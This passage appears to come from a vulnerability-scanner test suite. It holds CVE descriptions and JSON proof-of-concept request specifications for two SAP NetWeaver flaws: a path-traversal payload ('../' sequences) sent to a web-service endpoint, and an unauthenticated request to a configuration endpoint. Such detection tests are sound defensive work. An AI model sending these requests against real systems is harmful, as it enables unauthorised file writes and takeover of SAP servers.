--------------------------------------------------------------------------------
1 | The insufficient input path validation of certain parameter in the web service
2 | of SAP NetWeaver AS JAVA (LM Configuration Wizard), versions - 7.30, 7.31,
3 | 7.40, 7.50, allows an unauthenticated attacker to exploit a method to download
4 | zip files to a specific directory, leading to Path Traversal.
--------------------------------------------------------------------------------
/tests/CVE-2020-6286/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6286
--------------------------------------------------------------------------------
/tests/CVE-2020-6286/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/CTCWebService/CTCWebServiceBean",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 CVE-2020-6286 PoC",
7 | "Content-Type": "text/xml;charset=UTF-8",
8 | "Connection": "close"
9 | },
10 | "Data-File": "test1.txt",
11 | "Reference": "https://github.com/chipik/SAP_RECON/"
12 | }
13 | ]
--------------------------------------------------------------------------------
/tests/CVE-2020-6286/test1.txt:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | /../../../../../../../../../../../../../../../../../..test.txt
6 |
7 |
8 |
--------------------------------------------------------------------------------
/tests/CVE-2020-6287/description.txt:
--------------------------------------------------------------------------------
1 | SAP NetWeaver AS JAVA (LM Configuration Wizard), versions - 7.30, 7.31, 7.40,
2 | 7.50, does not perform an authentication check which allows an attacker without
3 | prior authentication to execute configuration tasks to perform critical actions
4 | against the SAP Java system, including the ability to create an administrative
5 | user, and therefore compromising Confidentiality, Integrity and Availability of
6 | the system, leading to Missing Authentication Check.
--------------------------------------------------------------------------------
/tests/CVE-2020-6287/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6287
--------------------------------------------------------------------------------
/tests/CVE-2020-6287/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/CTCWebService/Config1?wsd",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 CVE-2020-6286 PoC",
7 | "Content-Type": "application/xml",
8 | "Connection": "close"
9 | },
10 | "Reference": "https://github.com/chipik/SAP_RECON/"
11 | }
12 | ]
--------------------------------------------------------------------------------